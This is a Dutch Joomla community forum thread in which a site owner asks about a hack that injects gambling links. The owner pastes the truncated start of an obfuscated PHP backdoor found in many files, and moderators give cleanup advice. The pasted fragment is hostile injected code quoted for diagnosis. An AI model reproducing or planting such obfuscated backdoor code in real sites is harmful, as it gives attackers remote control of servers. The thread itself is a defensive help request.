Doorzoek het forum

Trefwoord

Welkom bij Joomla!NL

Om alle mogelijkheden van dit forum te kunnen gebruiken, moet je je eerst registreren.

× Vermeld in iedere vraag duidelijk:
  1. De versie van Joomla! 3.X die je gebruikt
  2. De volledige url van je website indien mogelijk.
  3. De versie van de extensie waar de vraag over gaat.

Hack? joomla 3

06 mrt 2016 15:47
Heeft onderwerp gestart
Hack? joomla 3 #1
Mijn website is gehacked, er verschijnen links naar gok website op wisselende plaatsen in de website layout.

Ik zie dat bepaalde php files beginnen met:
<?php $rrnhysava = '#}+;%-qp%)54l}	x27;%!<*#}_;#)323f!|!*uyfu	x27k:!ftmf!}Z;^nbsbq%	x5cS*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc	x7	163	x69	145")) or (strstr($uas,"	x72	166	x3a	61	x31"))) { $gdlduis4`hA	x27pd%6<pd%w6Z6<.3`hA	x27pd%6<pd%w6Z6<hA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f	x27,*e	x275:52985-t.98]K4]65]D8]

De code is veel langer dan boven, is alleen eerste gedeelte. Is dit de hack? Hoe kan dit, de website is geupdate. Kan iemand er wat meer over vertellen?
tiwi
Bekend met Joomla!NL
Bekend met Joomla!NL
Berichten: 92
Lees meer
06 mrt 2016 16:03 06 mrt 2016 16:10 door Peter.
Hack? joomla 3 #2
Dat is inderdaad een hack.

Meestal wordt een site gehackt doordat er Malware of Spyware op je lokale pc zit.
Ga dus als volgt te werk:
  1. Zorg ervoor dat je PC Spy- en Malware vrij is.
  2. Zet een goede recente backup terug.
  3. wijzig al je wachtwoorden.
  4. update je site naar de nieuwste versie van Joomla en vergeet ook niet alle extensies mee te nemen.
  5. Maak meteen een nieuwe backup.

Je site scannen kan bijvoorbeeld hier: sitecheck.sucuri.net//

Met vriendelijke groet,

Peter Reitsma
Peter
Algemeen Moderator
Algemeen Moderator
Berichten: 2819
Lees meer
06 mrt 2016 16:15
Heeft onderwerp gestart
Hack? joomla 3 #3
Bedankt. Ik heb geen backup, dus alle php files nalopen?

Kan dit gekomen zijn doordat iemand toegang heeft gehad tot de mysql database?
tiwi
Bekend met Joomla!NL
Bekend met Joomla!NL
Berichten: 92
Lees meer
06 mrt 2016 17:02
Hack? joomla 3 #4
Heel soms is de hack gedaan in de database.
Maar veel vaker nog heeft men toegang gekregen tot de fysieke bestanden.
Veel hacks zijn mogelijk omdat websitebeheerders hun CMS en de erop geïnstalleerde extensies niet regelmatig updaten.
Volg dus in ieder geval de tips van Peter op.
En mocht je er zelf niet uitkomen, dan kunnen diensten als Sucuri of MyJoomla tegen betaling je website weer schoon opleveren.

Met vriendelijke groet,
Wouter Compactweb.nl
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum.
Ik beantwoord geen vragen via PM
WoodyF4u
Moderator + Nieuwsteam
Moderator + Nieuwsteam
Berichten: 10797
Lees meer
07 mrt 2016 08:02
Heeft onderwerp gestart
Hack? joomla 3 #5
Iemand in het buitenland heeft toegang gehad to de mysql database. Die zou echt iets met de database gedaan kunnen hebben. Maar wat?

Het is een sharedhosting en in elke website zijn bij heel php files en in alle folders codes als in eerst post geplaatst. Ze er zelf uithalen dat lijkt mij onmogelijk. Backups heb ik ook niet van alle sites.

Wat kan ik het beste doen?

Ik heb natuurlijk alles nagelopen voor keyloggers etc en wachtwoorden ed veranderd.
tiwi
Bekend met Joomla!NL
Bekend met Joomla!NL
Berichten: 92
Lees meer
07 mrt 2016 08:31
Hack? joomla 3 #6
Lijkt me sterk dat dit via de database in je site komt. Het is bijna zeker malware of een virus. Als een hacker toegang tot je database had gehad, dan zou je waarschijnlijk helemaal geen toegang meer tot je site hebben gehad.

Daarnaast is het natuurlijk heel onverstandig om niet regelmatig backups te maken.

Je kunt dus of je site op laten schonen of een backup maken van je database, een schone joomla installeren met daarin alle gebruikte extensies en dan je database weer koppelen. Haal nog wel eerst alle afbeeldingen naar je computer, scan ze en zet ze daarna weer terug in je schone site.

Groetjes, Astrid
Gebruik de zoekfunctie van dit forum voordat je een nieuwe vraag plaatst.
Vragen uitsluitend via dit Forum.
yndi.nl - kvk 17157725
Is je vraag beantwoord? Dan kan je het draadje zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.

Deze afbeelding is verborgen voor gasten.
Login of registreer om deze te zien.

Astrid
Moderator + Technisch team
Moderator + Technisch team
Berichten: 36027
Lees meer
07 mrt 2016 08:47
Heeft onderwerp gestart
Hack? joomla 3 #7
Met laten opschonen bedoel je diensten die WoodyF4U noemt?

Ik snap ook niet wat de hack doet? deze website thaicontracts.com is besmet in bijna elke folder van deze website zijn dit soort codes in php files te vinden.
tiwi
Bekend met Joomla!NL
Bekend met Joomla!NL
Berichten: 92
Lees meer
07 mrt 2016 10:04
Hack? joomla 3 #8
Je hacker heeft blijkbaar voldoende toegang kunnen krijgen om lekker rond te rommelen.
Dat bewijst maar weer eens hoe belangrijk regelmatig updaten en het maken van back-ups dus is.

Als je het niet zelf kunt opschonen, dan is het inderdaad het beste om gebruik te maken van de diensten die ik je hierboven heb genoemd.
En mocht je dat niet zien zitten of te duur vinden, dan zit er niets anders op dan je website opnieuw te bouwen.
Uiteraard wel pas nadat je voor je database , je FTP-accounts en je hostingbeheerscherm een ander wachtwoord hebt ingesteld.
En uiteraard jouw PC en die van medebeheerders hebt gescand of virussen of malware.
9 van de 10 hacks worden namelijk uitgevoerd via een besmette PC van de beheerder van de website.

Met vriendelijke groet,
Wouter Compactweb.nl
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum.
Ik beantwoord geen vragen via PM
WoodyF4u
Moderator + Nieuwsteam
Moderator + Nieuwsteam
Berichten: 10797
Lees meer
07 mrt 2016 10:25
Heeft onderwerp gestart
Hack? joomla 3 #9
Heb je enig idee wat de code doet?
tiwi
Bekend met Joomla!NL
Bekend met Joomla!NL
Berichten: 92
Lees meer
07 mrt 2016 10:32 07 mrt 2016 10:51 door Astrid. Reden: typo
Hack? joomla 3 #10
Nee, ik niet.
Maar bij Sucuri of MyJoomla doen ze dagelijks niets anders dan in dit soort code duiken.
Zij kunnen je hier zeker meer uitleg over geven.

Met vriendelijke groet,
Wouter Compactweb.nl
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum.
Ik beantwoord geen vragen via PM
WoodyF4u
Moderator + Nieuwsteam
Moderator + Nieuwsteam
Berichten: 10797
Lees meer
07 mrt 2016 14:58
Heeft onderwerp gestart
Hack? joomla 3 #11
Zou het een oplossing zijn om de joomla folders te overschrijven of te verwijderen en dan weer opnieuw upload. Als ik bijvoorbeeld de folder administrator met ftp delete en deze weer upload van een gelijke schone joomla website?
tiwi
Bekend met Joomla!NL
Bekend met Joomla!NL
Berichten: 92
Lees meer
07 mrt 2016 15:02
Hack? joomla 3 #12
Nee dat is niet de oplossing, de oplossingen die hier zijn geschreven navolgen. ;)

Groeten, Jelle
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum eens.
Vragen via dit Forum (niet per PM of E-mail)
Is je vraag opgelost? Dan kan je hem zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.

Deze afbeelding is verborgen voor gasten.
Login of registreer om deze te zien.

Jelle
Algemeen Moderator
Algemeen Moderator
Berichten: 13463
Lees meer
07 mrt 2016 15:21
Heeft onderwerp gestart
Hack? joomla 3 #13
ok sucuri vraagt 600 usd voor 2 websites.... veel geld
tiwi
Bekend met Joomla!NL
Bekend met Joomla!NL
Berichten: 92
Lees meer
07 mrt 2016 15:31
Hack? joomla 3 #14
Oké,

Dan is de optie van Astrid nog open, als je geen backup hebt is het natuurlijk ook erg moeilijk.

Backup maken van je database, een schone joomla installeren met daarin alle gebruikte extensies en dan je database weer koppelen. Haal nog wel eerst alle afbeeldingen naar je computer, scan ze en zet ze daarna weer terug in je schone site.

Misschien dat je hoster nog kan helpen met een backup?

Groeten, Jelle
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum eens.
Vragen via dit Forum (niet per PM of E-mail)
Is je vraag opgelost? Dan kan je hem zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.

Deze afbeelding is verborgen voor gasten.
Login of registreer om deze te zien.

Jelle
Algemeen Moderator
Algemeen Moderator
Berichten: 13463
Lees meer
07 mrt 2016 17:04
Heeft onderwerp gestart
Hack? joomla 3 #15
Ik heb yourhosting, nog steeds matig tevreden over deze hosting, was in verleden wel goed, nu is alle service bijna betaalde servvice, zij plaatsen backups tot 5 dagen gratis terug, daarna 178 euro, maar hun backups gaan niet verder dan 2 weken terug...

Heb contact gehad met de andere die je adviseerde myjoomla en zij vragen 88 GBP voor 1 website... Over de hack zeiden ze dat in een open door hack is, de hackers kunnen met deze hack allerlei opdrachten geven naar de server om iets te doen. Probleem is volgens hun ook de shared hosting structuur van yourhosting, om veschillende websites onder verschillende domeinnamen in 1 public html te plaatsen. Als 1 website is geinfecteerd zijn alle geinfecteerd.

Ik weet niet of oplossing van Astrid mogelijk is voor mij, HEEL veel werk lijkt me, in ieder geval voor een leek.
tiwi
Bekend met Joomla!NL
Bekend met Joomla!NL
Berichten: 92
Lees meer
Moderators: PeterJuliank92JelleRomke
Tijd voor maken pagina: 0.338 seconden

Wil je Joomla!NL steunen?

Steun Joomla!NLAlle teamleden werken enthousiast, op vrijwillige basis, mee aan Joomla!NL. Maar een website met forum kost nu eenmaal geld. Dus als je Joomla!NL wilt steunen, dan kan dat, graag zelfs!

Lees hier meer informatie

Joomla!NL op Twitter

Op dinsdag 25 oktober is Joomla! 4.2.4 vrijgegeven. Deze versie lost een tweetal beveiligingsproblemen op. https://t.co/saN5HQQyfD

Op dinsdag 27 september 2022 is Joomla! 4.2.3 vrijgegeven. Het betreft een versie die nieuwe verbeteringen bevat en… https://t.co/T7oGdV8LSs

De naam Joomla!® en logo worden gebruikt onder een beperkte licentie met toestemming van Open Source Matters.
Joomlanl.nl is niet verbonden aan en is geen onderdeel van Open Source Matters, Inc, of het Joomla! project.

© 2023 - Joomla!NL | Gehost door Wned